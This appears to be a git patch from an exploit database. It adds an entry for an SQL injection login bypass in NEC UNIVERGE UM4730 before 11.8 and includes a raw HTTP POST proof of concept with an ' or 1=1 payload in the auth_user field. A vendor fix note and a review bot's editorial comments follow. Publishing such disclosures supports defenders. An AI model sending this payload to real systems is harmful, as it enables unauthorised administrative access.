From 10a46aac45934322a9064a6ab9f698352003db0c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 22 Jul 2017 05:01:21 +0000
Subject: [PATCH] DB: 2017-07-22 1 new exploits NEC UNIVERGE UM4730 < 11.8 - SQL Injection
---
 files.csv | 1 +
 platforms/php/webapps/42353.txt | 29 +++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+)
 create mode 100755 platforms/php/webapps/42353.txt
diff --git a/files.csv b/files.csv
index 261663f97..fd18cfab3 100644
--- a/files.csv
+++ b/files.csv
@@ -38156,3 +38156,4 @@ id,file,description,date,author,platform,type,port
 42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
+42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0
diff --git a/platforms/php/webapps/42353.txt b/platforms/php/webapps/42353.txt
new file mode 100755
index 000000000..8c14f36b5
--- /dev/null
+++ b/platforms/php/webapps/42353.txt
@@ -0,0 +1,29 @@
+# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
+# Vulnerbility: SQL injection login bypass
+# Date: 15-12-2016
+# Exploit Author: b0x41s
+# Author web: https://www.xrayit.nl
+# Vendor Homepage: https://www.nec-enterprise.com
+# Category: webapps
+# Version: 11.6.0.31
+# Tested on: Windows server 2008
+
+Description:
+The auth_user parameter is vulnerable to SQL injection.
+The login can be bypassed.
+
+POC:
+POST /admin/index.php HTTP/1.1
+Host: 127.0.0.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: https://127.0.0.1/admin/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Lenght: 105
+Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en
+submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de
+
+Fix answer from vendor:
+The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.
\ No newline at end of file
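Review bot: The affected range `< 11.8` in the title rests only on the vendor reply quoted in the last line, while `# Version: 11.6.0.31` is the single build the header says was tested, so the header should state where the range comes from, e.g. `# Fixed in: 11.8 (per vendor statement; only 11.6.0.31 was tested)`. The header field is misspelled as `Vulnerbility`, and its `Date: 15-12-2016` sits alongside the files.csv entry dated 2017-07-21 in the same commit; if the earlier date is the report date to the vendor, labelling it as such would remove the apparent contradiction. The file documents the weakness and the vendor's reply but gives operators no remediation line; a sentence such as `Remediation: upgrade to 11.8 or later (vendor states the WAC login page fix was committed before the 11.8 release)` would make the entry actionable for defenders reading it from the index.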